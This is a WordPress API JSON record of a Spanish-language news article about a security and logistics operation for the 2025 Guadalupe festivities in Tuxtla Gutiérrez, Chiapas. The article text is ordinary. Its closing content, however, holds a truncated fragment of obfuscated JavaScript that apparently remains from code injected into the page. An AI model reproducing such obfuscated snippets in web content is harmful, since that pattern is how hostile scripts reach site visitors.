{"id":25488,"date":"2025-11-27T01:59:47","date_gmt":"2025-11-27T01:59:47","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25488"},"modified":"2025-11-27T01:59:47","modified_gmt":"2025-11-27T01:59:47","slug":"planean-operativo-especial-por-fiestas-guadalupanas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25488","title":{"rendered":"Planean operativo especial por fiestas guadalupanas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000459955-1024x682.jpg\" alt=\"\" class=\"wp-image-25489\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000459955-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000459955-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000459955-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000459955-1536x1023.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000459955-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000459955.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><br>Manuel Jim\u00e9nez.<br>26 de noviembre del 2025. Tuxtla Guti\u00e9rrez.- Las autoridades eclesi\u00e1sticas y municipales presentaron un operativo conjunto de seguridad y log\u00edstica para atender esta masiva afluencia, a las festividades guadalupanas en Tuxtla que se prev\u00e9 sea m\u00e1s del 50% superior a la del 2023.<br>El padre Juan Carlos Mendoza V\u00e1zquez, p\u00e1rroco del recinto, explic\u00f3 que si bien las actividades religiosas se extender\u00e1n hasta el 12 de diciembre, los d\u00edas de mayor concentraci\u00f3n ser\u00e1n el 11 y el 12. El programa incluye la coronaci\u00f3n de la Virgen la noche del 11, a las 22:30 horas, oficiada por el arzobispo Jos\u00e9 Francisco Gonz\u00e1lez, y las ma\u00f1anitas del d\u00eda 12 a las 6:00 de la ma\u00f1ana, con la presencia del obispo auxiliar Jos\u00e9 Luis Mendoza. Ese mismo d\u00eda, a mediod\u00eda, se recibir\u00e1 a la magna peregrinaci\u00f3n proveniente de Villaflores.<\/p>\n\n\n\n<p>Ante la expectativa de m\u00e1s de 900 grupos de peregrinos, las autoridades detallaron las medidas de prevenci\u00f3n. Eder Mancilla, secretario de Protecci\u00f3n Civil municipal, hizo un llamado a los peregrinos para evitar incendios en pastizales, verificar las condiciones de sus veh\u00edculos y su estado de salud antes de viajar. Reiter\u00f3, adem\u00e1s, la prohibici\u00f3n absoluta de pirotecnia en los accesos a la ciudad.<\/p>\n\n\n\n<p>En materia de movilidad, David Hern\u00e1ndez, secretario de Seguridad P\u00fablica, inform\u00f3 que se implementar\u00e1n cierres viales estrat\u00e9gicos para privilegiar el flujo peatonal y garantizar el paso de unidades de emergencia. Como apoyo a los visitantes, se instalar\u00e1n carpas y ba\u00f1os p\u00fablicos en la Avenida Central, entre 8\u00aa y 9\u00aa Poniente, para ofrecer un espacio de pernocta y evitar as\u00ed la saturaci\u00f3n del Parque de la Marimba.<\/p>\n\n\n\n<p>El operativo de seguridad contar\u00e1 con la participaci\u00f3n de m\u00e1s de 400 elementos de diversas corporaciones, quienes operar\u00e1n desde un puesto de mando instalado frente a la parroquia para responder de manera inmediata a cualquier contingencia durante esta celebraci\u00f3n de fe.<br>0000000<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez.26 de noviembre del 2025. Tuxtla Guti\u00e9rrez.- Las autoridades eclesi\u00e1sticas y municipales presentaron un operativo conjunto de seguridad y log\u00edstica para atender esta masiva afluencia, a las festividades guadalupanas en Tuxtla que se prev\u00e9 sea m\u00e1s del 50% superior a la del 2023.El padre Juan Carlos Mendoza V\u00e1zquez, p\u00e1rroco del recinto, explic\u00f3 que si &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25489,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-25488","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25488","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25488"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25488\/revisions"}],"predecessor-version":[{"id":25490,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25488\/revisions\/25490"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25489"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25488"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25488"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25488"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}